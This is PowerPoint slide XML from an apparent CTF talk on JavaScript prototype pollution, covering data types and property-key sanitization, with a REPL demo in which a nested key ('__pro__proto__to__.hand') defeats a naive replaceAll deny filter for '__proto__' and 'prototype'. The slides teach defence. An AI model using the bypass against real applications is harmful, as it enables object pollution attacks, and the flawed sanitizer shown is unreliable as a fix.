              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For CTF designers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" strike="sngStrike" dirty="0"/>
              <a:t>Torture CTF players and make them lose sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> Make the challenge more difficult and fun, or prevent unintended solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For CTF players: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" strike="sngStrike" dirty="0"/>
              <a:t>Avoid being tortured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> Avoid spending precious time on useless attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There are only a handful of measures, because defending against prototype pollution is easy after you have identified vulnerable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Identification is the more difficult part</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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794980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443-E5F0-C415-2540-98E6619FC689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Property key sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C456F2-5AE8-CE6F-D621-6F1F90F219E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We can remove bad property keys from user-provided inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We can use a deny approach, where we deny or remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Or we can use an allowlist approach given that we know the data structure beforehand, only allowing valid properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</a:t>
            </a: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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key) </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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key.replaceAll</a:t>
            </a:r>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"__proto__"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"prototype"</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 }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>undefined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sanitize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.hand</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 // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'.hand’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 sanitize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pro__proto__to__.hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) // oh noes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802CEDC7-63E4-7739-706E-4ABAB3E1E9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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1528ADBE-53EE-7DD0-0CF6-C88A9F825426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4928056"/>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https://portswigger.net/web-security/prototype-pollution/preventing#sanitizing-property-keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3490838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Data type</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>JavaScript only has 9 fundamental types [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We can (sort of) confirm this using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> operator [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We are mainly interested in the object and function type today</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11" descr="JavaScript data type hierarchy">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62737391-E732-2FCD-246E-A9F26ABB6CAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2652316471"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="165416" y="2239726"/>
          <a:ext cx="8645236" cy="253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9FD8E9D-DA30-0AC0-D7A4-C30E159B935A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="7461354" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Data_structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A yellow cartoon cat">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D9D4CF6-54D4-0BFB-E17B-C3BFED66ADEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5098591" y="2330747"/>
            <a:ext cx="741653" cy="741653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2320046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5B443-E5F0-C415-2540-98E6619FC689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Property key sanitization 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C456F2-5AE8-CE6F-D621-6F1F90F219E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The advantage is that it is compatible with existing code (e.g. libraries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The disadvantage with the deny approach is… What if you forget to sanitize somewhere? What if you don’t know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>pollutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> (at least you know now)? What if your implementation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>bypassable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1587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a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key) </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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key.replaceAll</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"__proto__"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>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 </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sanitize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.hand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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>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'.hand'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sanitize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pro__proto__to__.hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) // oh noes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.hand</a:t>
            </a:r>
            <a:r>
